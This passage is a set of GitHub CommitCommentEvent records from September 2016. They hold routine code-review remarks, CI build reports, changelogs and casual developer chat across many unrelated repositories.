{"id":"4597213999","type":"CommitCommentEvent","actor":{"login":"lukicweb"},"repo":{"name":"travisgoodspeed/MD380Tool"},"payload":{"comment":{"id":19116155,"position":null,"line":null,"path":null,"commit_id":"0bbd11d90f12ff2acc8076a6a58a72851598a8eb","created_at":"2016-09-21T15:58:44Z","updated_at":"2016-09-21T15:58:44Z","body":"Brate Travis @travisgoodspeed , please make it work, post it on google play and sell it for 10$.. you will get $$$$$$  :)... "}},"created_at":"2016-09-21T15:58:44Z"}
{"id":"4597221279","type":"CommitCommentEvent","actor":{"login":"jackwoodward"},"repo":{"name":"SignalR/SignalR"},"payload":{"comment":{"id":19116173,"position":null,"line":null,"path":null,"commit_id":"6ce631433b57505b0b3f1fe24f68f0681fca5aef","created_at":"2016-09-21T15:59:52Z","updated_at":"2016-09-21T15:59:52Z","body":"@halter73 Thanks for the reply. Slept on it and I think you're right this keep alive for long polling isn't going to work because of the possibility of proxies as you said. There does still need to be some way to stop a client from listening forever to a dead connection. If a timer was started inside of the LongPollingTransport.Poll method as soon as HttpClient.Post was called that after a configured timeout if we still and not gotten to the ContinueWith block would call LostConnection I think that would work. Or maybe it is as simple as setting a request timeout somewhere in the http post call stack, I think I saw somewhere that the timeout is disabled if it is long polling, maybe instead the longpolling http timeout should be configurable.\r\n"}},"created_at":"2016-09-21T15:59:52Z"}
{"id":"4597223464","type":"CommitCommentEvent","actor":{"login":"pkolodgy"},"repo":{"name":"pkolodgy/phase-0-tracks"},"payload":{"comment":{"id":19116178,"position":null,"line":null,"path":null,"commit_id":"a71d4fb8cbf021ab0f6483f31db2079ce39b1c42","created_at":"2016-09-21T16:00:13Z","updated_at":"2016-09-21T16:00:13Z","body":"Paired with @dannykalemba"}},"created_at":"2016-09-21T16:00:13Z"}
{"id":"4597228302","type":"CommitCommentEvent","actor":{"login":"mkozjak"},"repo":{"name":"qaap/pharos"},"payload":{"comment":{"id":19116187,"position":null,"line":null,"path":null,"commit_id":"4fd714a9462d1d2594be44276f62104e8f9b0b71","created_at":"2016-09-21T16:00:58Z","updated_at":"2016-09-21T16:00:58Z","body":"resolves #3 "}},"created_at":"2016-09-21T16:00:58Z"}
{"id":"4597230301","type":"CommitCommentEvent","actor":{"login":"stephanlukasczyk"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19116189,"position":19,"line":19,"path":"code/modules/Lemmatizer.py","commit_id":"cbb1b09ae30c726c60a7fc9de36f465a59a90bdb","created_at":"2016-09-21T16:01:15Z","updated_at":"2016-09-21T16:01:15Z","body":"Shouldn't this line be\r\n```python\r\nw_lemma = self.lemmata_mapping.get(stem, None)\r\n```\r\nOr do I get the meaning of this function wrong? Now you are checking, whether the limma exists. If not, we stem the word, check again whether the word exists (being _false_ in all cases) and return the stem. I'm sitting on these lines for some time now but I don't get it; could you please explain this to me?"}},"created_at":"2016-09-21T16:01:15Z"}
{"id":"4597231029","type":"CommitCommentEvent","actor":{"login":"jacobloveless"},"repo":{"name":"silas/node-consul"},"payload":{"comment":{"id":19116190,"position":null,"line":null,"path":null,"commit_id":"618a00c8929034af745a9f464627d439582a73c4","created_at":"2016-09-21T16:01:23Z","updated_at":"2016-09-21T16:01:23Z","body":"Hi Silas. Am I interpreting this correctly:\r\nWe attempt to acquire a lock on a key , passing the session and:\r\n\r\nIf we acquire the lock (e.g. ?acquire=<session> would return `true`) then lock.on(acquire) will fire\r\nIf we can NOT acquire the lock (e.g. ?acquire=<session) returns `false`) then lock.on(error) will fire\r\n\r\n? "}},"created_at":"2016-09-21T16:01:23Z"}
{"id":"4597237015","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19116204,"position":null,"line":null,"path":null,"commit_id":"e1ec00e502994ae29286e991e14c8c126a87f148","created_at":"2016-09-21T16:02:19Z","updated_at":"2016-09-21T16:02:19Z","body":"121784677-OAControllerFixes4633 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1195 of 1195 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e1ec00e502994ae29286e991e14c8c126a87f148-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.13%25-green.svg)</a>\n"}},"created_at":"2016-09-21T16:02:19Z"}
{"id":"4597238753","type":"CommitCommentEvent","actor":{"login":"Ravenstine"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19116209,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-21T16:02:36Z","updated_at":"2016-09-21T16:02:36Z","body":"@sdillingham I made some changes and want to see what you think.\r\nhttps://github.com/SCPR/scpr-style-guide/commit/95053250d505d678b153eadfca6012beaf93cb84\r\n\r\nThe one thing I didn't fully address is the grid math.  I went in a direction that got tangled, so I put that aside in order to complete the other changes and add documentation.  The style guide documentation includes examples, and I compiled the style guide css files using the standard Sass command line.  I'm not sure if that's how you normally build those files as I don't see a gulpfile that does that.  I'm guessing you do something to turn on the prefixing that I saw."}},"created_at":"2016-09-21T16:02:36Z"}
{"id":"4597238948","type":"CommitCommentEvent","actor":{"login":"frivolas"},"repo":{"name":"frivolas/TinyTerm"},"payload":{"comment":{"id":19116210,"position":null,"line":null,"path":null,"commit_id":"9d4eb3ae3ce8ac7abe60c7603b0e0673de772371","created_at":"2016-09-21T16:02:38Z","updated_at":"2016-09-21T16:02:38Z","body":"Script now allows to load a file. Then it checks if the file is the init.json and treats it accordingly. If it's any other kind of file it's treated as text and injected into the tinyG."}},"created_at":"2016-09-21T16:02:38Z"}
{"id":"4597242983","type":"CommitCommentEvent","actor":{"login":"igordotsenko"},"repo":{"name":"igordotsenko/andrew"},"payload":{"comment":{"id":19116218,"position":15,"line":15,"path":"Arithmetic/Arithmetic.cpp","commit_id":"cae2fb09eb384ed6eb01b06e9bd01622b550cb54","created_at":"2016-09-21T16:03:17Z","updated_at":"2016-09-21T16:03:17Z","body":"Good idea! But you should check BEFORE assigning.\r\n"}},"created_at":"2016-09-21T16:03:17Z"}
{"id":"4597246554","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19116225,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-21T16:03:53Z","updated_at":"2016-09-21T16:03:53Z","body":"Those aren't sent by the client"}},"created_at":"2016-09-21T16:03:53Z"}
{"id":"4597247821","type":"CommitCommentEvent","actor":{"login":"igordotsenko"},"repo":{"name":"igordotsenko/andrew"},"payload":{"comment":{"id":19116227,"position":76,"line":65,"path":"Arithmetic/Arithmetic.cpp","commit_id":"cae2fb09eb384ed6eb01b06e9bd01622b550cb54","created_at":"2016-09-21T16:04:06Z","updated_at":"2016-09-21T16:04:06Z","body":"why do you assign result to `value`?"}},"created_at":"2016-09-21T16:04:06Z"}
{"id":"4597250435","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19116234,"position":null,"line":null,"path":null,"commit_id":"ec522547e5f91792a13fe9aaf678f3e1b5ca42bc","created_at":"2016-09-21T16:04:30Z","updated_at":"2016-09-21T16:04:30Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec522547e5f91792a13fe9aaf678f3e1b5ca42bc-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.18%25-red.svg)</a> \n"}},"created_at":"2016-09-21T16:04:30Z"}
{"id":"4597250782","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19116235,"position":312,"line":528,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T16:04:33Z","updated_at":"2016-09-21T16:04:33Z","body":"maybe s/addr/mask?"}},"created_at":"2016-09-21T16:04:33Z"}
{"id":"4597254485","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19116243,"position":322,"line":538,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T16:05:11Z","updated_at":"2016-09-21T16:05:11Z","body":"if s/addr/mask , here s/mask/_mask"}},"created_at":"2016-09-21T16:05:11Z"}
{"id":"4597257898","type":"CommitCommentEvent","actor":{"login":"igordotsenko"},"repo":{"name":"igordotsenko/andrew"},"payload":{"comment":{"id":19116254,"position":85,"line":85,"path":"Arithmetic/Arithmetic.cpp","commit_id":"cae2fb09eb384ed6eb01b06e9bd01622b550cb54","created_at":"2016-09-21T16:05:43Z","updated_at":"2016-09-21T16:05:43Z","body":"Actually you don't have to keep value anymore. It will be calculated after `operator *` called"}},"created_at":"2016-09-21T16:05:43Z"}
{"id":"4597259466","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19116258,"position":5,"line":2108,"path":"wcfsetup/setup/db/install.sql","commit_id":"2069e7a953ec8f1a8c97621e6ebf7fe629af2d85","created_at":"2016-09-21T16:05:59Z","updated_at":"2016-09-21T16:05:59Z","body":"This should be `rgba` as well, no?"}},"created_at":"2016-09-21T16:05:59Z"}
{"id":"4597261624","type":"CommitCommentEvent","actor":{"login":"dg"},"repo":{"name":"nette/di"},"payload":{"comment":{"id":19116265,"position":8,"line":89,"path":"src/DI/PhpReflection.php","commit_id":"5adb374d919c57a84491d1fde5f3b119fd55bd05","created_at":"2016-09-21T16:06:20Z","updated_at":"2016-09-21T16:06:20Z","body":"Of couse not, but are still used. "}},"created_at":"2016-09-21T16:06:20Z"}
{"id":"4597263831","type":"CommitCommentEvent","actor":{"login":"n1rvana"},"repo":{"name":"FactomProject/factomd"},"payload":{"comment":{"id":19116269,"position":null,"line":null,"path":null,"commit_id":"0872dc25a62df3bcf1aff19132a186e7931de89e","created_at":"2016-09-21T16:06:41Z","updated_at":"2016-09-21T16:06:41Z","body":"Also, remove unnecessary infinite loop."}},"created_at":"2016-09-21T16:06:41Z"}
{"id":"4597264511","type":"CommitCommentEvent","actor":{"login":"rwinch"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":19116270,"position":28,"line":36,"path":"web/src/test/java/org/springframework/security/web/firewall/FirewalledResponseTests.java","commit_id":"2e6656e9d3fe99167333a8f6eebb480cac42ca70","created_at":"2016-09-21T16:06:47Z","updated_at":"2016-09-21T16:06:47Z","body":"Thanks for the information. For some reason I thought the instance was reused. I thought that `ExpectedException.none()` was reset using the `Rule` API. It appears I was wrong. Thanks again!"}},"created_at":"2016-09-21T16:06:47Z"}
{"id":"4597265517","type":"CommitCommentEvent","actor":{"login":"jasonlam604"},"repo":{"name":"jasonlam604/Stringizer"},"payload":{"comment":{"id":19116274,"position":9,"line":37,"path":"README.md","commit_id":"3ac850ee454773457d563a4329fb002265e736ea","created_at":"2016-09-21T16:06:57Z","updated_at":"2016-09-21T16:06:57Z","body":"Oh yes! good catch, thank you!  Yes, **chompLeft** and **chompRight** should be deprecated to support backward compatibility for at least a few releases then removed at a later date; **chopLeft** and **chopRight** should be added. \r\n\r\nAre you interested in doing a pull-request? if not I get to it asap."}},"created_at":"2016-09-21T16:06:57Z"}
{"id":"4597270557","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19116280,"position":19,"line":21,"path":"app/views/tasks/index.html.erb","commit_id":"42e0e8224327ca542999ef21168159d95dcdee0f","created_at":"2016-09-21T16:07:34Z","updated_at":"2016-09-21T16:07:34Z","body":"ID se postavlja na elemente koji su jedinstveni na stranici i sigurno ce postojati samo jedan jedini. Submit dugme je nesto sto se sigurno ponavlja na stranici. Ali ovo je svakako mala napomena da se koriste klase umesto ID."}},"created_at":"2016-09-21T16:07:34Z"}
{"id":"4597270567","type":"CommitCommentEvent","actor":{"login":"nantonel"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19116281,"position":67,"line":106,"path":"src/Prox.jl","commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-21T16:07:34Z","updated_at":"2016-09-21T16:07:34Z","body":"In my opinion `prox(f,x,y,gamma)` looks more tidy."}},"created_at":"2016-09-21T16:07:34Z"}
{"id":"4597278152","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19116297,"position":3,"line":3,"path":"spec/features/tasks_spec.rb","commit_id":"42e0e8224327ca542999ef21168159d95dcdee0f","created_at":"2016-09-21T16:08:50Z","updated_at":"2016-09-21T16:08:50Z","body":"Dobro je napisano. "}},"created_at":"2016-09-21T16:08:50Z"}
{"id":"4597280215","type":"CommitCommentEvent","actor":{"login":"cladcladclad"},"repo":{"name":"cladcladclad/FIFA-CM-History"},"payload":{"comment":{"id":19116301,"position":null,"line":null,"path":null,"commit_id":"be7d76c12d354ebfc9f5bf016f6ebb183b6f4f16","created_at":"2016-09-21T16:09:12Z","updated_at":"2016-09-21T16:09:12Z","body":"V 1.0 Changelog:\r\n- increased length of Career Mode tabs to FIFA's full 15 seasons\r\n- added additional rows in player list, allowing for 70 total players\r\n- added instructions to clarify how to use player list - DO NOT REMOVE PLAYERS"}},"created_at":"2016-09-21T16:09:12Z"}
{"id":"4597281895","type":"CommitCommentEvent","actor":{"login":"MynorCifuentes"},"repo":{"name":"MynorCifuentes/JavaApplication39"},"payload":{"comment":{"id":19116304,"position":null,"line":null,"path":null,"commit_id":"52e4dcb0520d2b3f8cc58a82259a67af3da985f5","created_at":"2016-09-21T16:09:29Z","updated_at":"2016-09-21T16:09:29Z","body":"It's Working!\r\nso lets do it again but now with my homework"}},"created_at":"2016-09-21T16:09:29Z"}
{"id":"4597284466","type":"CommitCommentEvent","actor":{"login":"qunaxis"},"repo":{"name":"qunaxis/hello-world"},"payload":{"comment":{"id":19116307,"position":3,"line":3,"path":"README.md","commit_id":"93433fc63b0e1f525c60323b3cf158f649af799d","created_at":"2016-09-21T16:09:55Z","updated_at":"2016-09-21T16:09:55Z","body":"рппук"}},"created_at":"2016-09-21T16:09:55Z"}
{"id":"4597285011","type":"CommitCommentEvent","actor":{"login":"fengtianqi"},"repo":{"name":"fengtianqi/testGit"},"payload":{"comment":{"id":19116311,"position":4,"line":20,"path":"GitDemo/GitDemo/ViewController.m","commit_id":"c542b99e005240e8a40ba7ef5cf07d6fd8c95ca5","created_at":"2016-09-21T16:10:00Z","updated_at":"2016-09-21T16:10:00Z","body":"这里做了修改"}},"created_at":"2016-09-21T16:10:00Z"}
{"id":"4597288453","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19116321,"position":null,"line":null,"path":null,"commit_id":"3962ed19f23f57d28a01d5fe6b35cd2d24e8b869","created_at":"2016-09-21T16:10:34Z","updated_at":"2016-09-21T16:10:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CoBzqFbj&#x2F;22-tester-le-chargement-du-jeu-dataset\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> tester le chargement du jeu : dataset</a>"}},"created_at":"2016-09-21T16:10:34Z"}
{"id":"4597291511","type":"CommitCommentEvent","actor":{"login":"Tabrizian"},"repo":{"name":"AoLab/I1820-RPi"},"payload":{"comment":{"id":19116327,"position":null,"line":null,"path":null,"commit_id":"54e30e523a7fe0700ef9a5afc089dd2a28613692","created_at":"2016-09-21T16:11:04Z","updated_at":"2016-09-21T16:11:04Z","body":"Why filename is khar.sh Man?!\r\n"}},"created_at":"2016-09-21T16:11:04Z"}
{"id":"4597292951","type":"CommitCommentEvent","actor":{"login":"Tabrizian"},"repo":{"name":"AoLab/I1820-RPi"},"payload":{"comment":{"id":19116331,"position":4,"line":4,"path":"lamp.sh","commit_id":"54e30e523a7fe0700ef9a5afc089dd2a28613692","created_at":"2016-09-21T16:11:18Z","updated_at":"2016-09-21T16:11:18Z","body":"In here!!!!"}},"created_at":"2016-09-21T16:11:18Z"}
{"id":"4597294881","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19116342,"position":null,"line":null,"path":null,"commit_id":"585ca21c115460a8039b5a473c1dd682b17797f0","created_at":"2016-09-21T16:11:37Z","updated_at":"2016-09-21T16:11:37Z","body":"Hm, does the result mean that the correct pinners fix was maybe a regression? What about a sanity check also in this?"}},"created_at":"2016-09-21T16:11:37Z"}
{"id":"4597295734","type":"CommitCommentEvent","actor":{"login":"ijiechen"},"repo":{"name":"ijiechen/aspnetcore-doc-cn"},"payload":{"comment":{"id":19116345,"position":null,"line":null,"path":null,"commit_id":"c0ec742fa119d3e7bf876c23963700ce384bbbc4","created_at":"2016-09-21T16:11:44Z","updated_at":"2016-09-21T16:11:44Z","body":"`查看或下载示例代码 <https://github.com/aspnet/Docs/tree/master/aspnet/mvc/views/partial/sample>`__"}},"created_at":"2016-09-21T16:11:44Z"}
{"id":"4597295884","type":"CommitCommentEvent","actor":{"login":"beaulirl"},"repo":{"name":"beaulirl/recepts"},"payload":{"comment":{"id":19116346,"position":null,"line":null,"path":null,"commit_id":"8a9e15205a8748fc214b8612203a204cddf5a2ac","created_at":"2016-09-21T16:11:45Z","updated_at":"2016-09-21T16:11:45Z","body":"да, наверное стоит сделать MVC версию) Сейчас я готовлюсь к тестированию, хочу попробовать пройти обучение, которая организует у нас одна IT компания совместно с лобачом, на этой неделе закончу с этим и начну думать как реализовать мое приложение в Zend. Как твои дела? Как развивается стартап?  "}},"created_at":"2016-09-21T16:11:45Z"}
{"id":"4597302529","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116366,"position":null,"line":null,"path":null,"commit_id":"352ee579f197aa427903b7b5af845487da88e1cb","created_at":"2016-09-21T16:12:55Z","updated_at":"2016-09-21T16:12:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1088](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13815&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T16:12:55Z"}
{"id":"4597302578","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116367,"position":null,"line":null,"path":null,"commit_id":"b08a0e98d2c665c9bf19cf03a5df99e901c33991","created_at":"2016-09-21T16:12:55Z","updated_at":"2016-09-21T16:12:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1089](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13816&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T16:12:55Z"}
{"id":"4597305302","type":"CommitCommentEvent","actor":{"login":"fivelike"},"repo":{"name":"fivelike/xmysite"},"payload":{"comment":{"id":19116372,"position":16,"line":16,"path":"README.md","commit_id":"f05ab4ebc9425d757331339b870169e04edc5777","created_at":"2016-09-21T16:13:21Z","updated_at":"2016-09-21T16:13:21Z","body":"fivelike do nothing today..."}},"created_at":"2016-09-21T16:13:21Z"}
{"id":"4597307532","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19116374,"position":null,"line":null,"path":null,"commit_id":"9dd0df81a49aa6e37d787aca356533b5599d472c","created_at":"2016-09-21T16:13:44Z","updated_at":"2016-09-21T16:13:44Z","body":"That't what I found too hehe"}},"created_at":"2016-09-21T16:13:44Z"}
{"id":"4597308776","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19116376,"position":null,"line":null,"path":null,"commit_id":"b08a0e98d2c665c9bf19cf03a5df99e901c33991","created_at":"2016-09-21T16:13:57Z","updated_at":"2016-09-21T16:13:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1089](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13816&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:03"}},"created_at":"2016-09-21T16:13:57Z"}
{"id":"4597310135","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19116380,"position":null,"line":null,"path":null,"commit_id":"a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5","created_at":"2016-09-21T16:14:11Z","updated_at":"2016-09-21T16:14:11Z","body":"The next step is to load the spinode.fth and sdnode.fth drivers.  I have\nbeen loading them with fload instead of compiling them in.  (Mostly this\nis because I am going to be using them as a teaching aid for my OFW\nclass, and I want to teach the students how to test drivers without\nrecompiling.)\n\nok rf spinode.fth\n<send via xmodem>\nok rf sdnode.fth\n<send via xmodem>\n\n<Thence>\nok fl spinode.fth  fl sdnode.fth\nok .partitions /sd\nok select /sd:\\SOMEFILE.EXT\nok pad 200 read  pad swap dump\n\n\n\nOn 9/21/2016 12:37 AM, James Cameron wrote:\n> Woohoo, `sd-init` works.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MitchBradley/cforth/commit/a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5#commitcomment-19111499>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEoszUMYW4_zGREiamqGSQMh_Fg9wpZ-ks5qsQj4gaJpZM4KCSUu>.\n> \n"}},"created_at":"2016-09-21T16:14:11Z"}
{"id":"4597320873","type":"CommitCommentEvent","actor":{"login":"FenrirWillow"},"repo":{"name":"elsys/survival-guide"},"payload":{"comment":{"id":19116412,"position":28,"line":28,"path":"11-linux.md","commit_id":"662cbb3d53692e9cb939dbee84d737768ee2cf8d","created_at":"2016-09-21T16:16:00Z","updated_at":"2016-09-21T16:16:00Z","body":"Линка не се чупи на Chrome, ама не е нужно да escape-ваш линковете в Markdown"}},"created_at":"2016-09-21T16:16:00Z"}
{"id":"4597321598","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19116414,"position":null,"line":null,"path":null,"commit_id":"9dd0df81a49aa6e37d787aca356533b5599d472c","created_at":"2016-09-21T16:16:07Z","updated_at":"2016-09-21T16:16:07Z","body":"I will add few"}},"created_at":"2016-09-21T16:16:07Z"}
{"id":"4597327985","type":"CommitCommentEvent","actor":{"login":"hlogeon"},"repo":{"name":"beaulirl/recepts"},"payload":{"comment":{"id":19116423,"position":null,"line":null,"path":null,"commit_id":"8a9e15205a8748fc214b8612203a204cddf5a2ac","created_at":"2016-09-21T16:17:11Z","updated_at":"2016-09-21T16:17:11Z","body":"Дела огонь, сижу на бичпакетах, денег нет, настроение отличное, всё как Медвед завещал! Стартап так себе, никто, кроме меня и еще одного чувака(который делает UI/UX, маркетинг, SEO и бизнес-стратегию) не работает, потому я решил открыть код фронтенда на github)\r\nhttps://github.com/hlogeon/venvatst-angular\r\nhttps://github.com/hlogeon/venvast-admin\r\n\r\nКак только полностью опубликуемся, еще и backend выложу :smiling_imp: \r\nМожет хоть кому-то будет польза от моих страданий :smile: "}},"created_at":"2016-09-21T16:17:11Z"}
{"id":"4597328925","type":"CommitCommentEvent","actor":{"login":"L3K0V"},"repo":{"name":"elsys/survival-guide"},"payload":{"comment":{"id":19116425,"position":28,"line":28,"path":"11-linux.md","commit_id":"662cbb3d53692e9cb939dbee84d737768ee2cf8d","created_at":"2016-09-21T16:17:21Z","updated_at":"2016-09-21T16:17:21Z","body":"@FenrirWillow, от копи-пейст е това, ще го оправя - мерси"}},"created_at":"2016-09-21T16:17:21Z"}
{"id":"4597329539","type":"CommitCommentEvent","actor":{"login":"joseph-robertson"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19116426,"position":null,"line":null,"path":null,"commit_id":"745de0a2c13e2776461c3fd20119b2a31835d73a","created_at":"2016-09-21T16:17:27Z","updated_at":"2016-09-21T16:17:27Z","body":"Shouldn't be that bad."}},"created_at":"2016-09-21T16:17:27Z"}
{"id":"4597335532","type":"CommitCommentEvent","actor":{"login":"NossaMarcelo"},"repo":{"name":"NossaMarcelo/PesquisaEleitoral"},"payload":{"comment":{"id":19116445,"position":null,"line":null,"path":null,"commit_id":"cda355030f1745475a238a6e2f94f0cc3bcc907f","created_at":"2016-09-21T16:18:25Z","updated_at":"2016-09-21T16:18:25Z","body":"Wate"}},"created_at":"2016-09-21T16:18:25Z"}
{"id":"4597336296","type":"CommitCommentEvent","actor":{"login":"NossaMarcelo"},"repo":{"name":"NossaMarcelo/PesquisaEleitoral"},"payload":{"comment":{"id":19116446,"position":4,"line":10,"path":"WareHouse/MainWindow.xaml","commit_id":"cda355030f1745475a238a6e2f94f0cc3bcc907f","created_at":"2016-09-21T16:18:33Z","updated_at":"2016-09-21T16:18:33Z","body":"QUI pORRA É ESSA"}},"created_at":"2016-09-21T16:18:33Z"}
{"id":"4597338704","type":"CommitCommentEvent","actor":{"login":"harishpro"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19116452,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-21T16:18:58Z","updated_at":"2016-09-21T16:18:58Z","body":"//Program For evenlySpaced\r\nimport java.util.*;\r\nclass javaApp{\r\n\tpublic static void main(String ar[]){\r\n\t  Scanner sc = new Scanner(System.in);\r\n\t  System.out.println(\"enter three numbers\");\r\n\t  int a = sc.nextInt();\r\n\t  int b = sc.nextInt();\r\n\t  int c = sc.nextInt();\r\n\t  int d = ((((a>b)?a>c?a:c:b>c?b:c) -((a<b)?a<c?a:c:b<c?b:c))%2 != 0 ? (((a>b)?a>c?a:c:b>c?b:c) - ((a<b)?a<c?a:c:b<c?b:c))/2 + 1 : (((a>b)?a>c?a:c:b>c?b:c) - ((a<b)?a<c?a:c:b<c?b:c))/2) + ((a<b)?a<c?a:c:b<c?b:c);\r\n\t   if(d==a|d==b|d==c)\r\n\t\t System.out.println(\"true\");\r\n\t   else\r\n\t\t System.out.println(\"false\");\r\n   }\r\n}\r\n"}},"created_at":"2016-09-21T16:18:58Z"}
{"id":"4597343248","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19116462,"position":null,"line":null,"path":null,"commit_id":"570a428032ff670679605ad77e6ecde5d1871f99","created_at":"2016-09-21T16:19:42Z","updated_at":"2016-09-21T16:19:42Z","body":"\nBuild report #161668813 for sha 570a428032ff670679605ad77e6ecde5d1871f99:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.06%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3047%20/%209965%20%2830.58%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-25.38%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-21T16:19:42Z"}
{"id":"4597343878","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19116465,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T16:19:49Z","updated_at":"2016-09-21T16:19:49Z","body":"Thanks for fixing the typo with saltenv in doc string\r\n\r\nHere are some thoughts around the original code. Being a bit verbose so I know I have not missed anything.\r\n\r\nIf population of  `__opts__['abc']` will always exist and is check that it is an int, then it makes sense to remove the checking.     If it does do this, it would be nice if population of `__opts__`  also had `file` and `dir` type to check they are valid for the target platform, then more code could be removed.\r\n\r\nL425 refresh = Logic Change to just force vs \r\n`(force and (expired_min == 0 or repo_age_sec < expired_min))`\r\n`expired_min` is their because a refresh is a very expensive operation, and some of the code 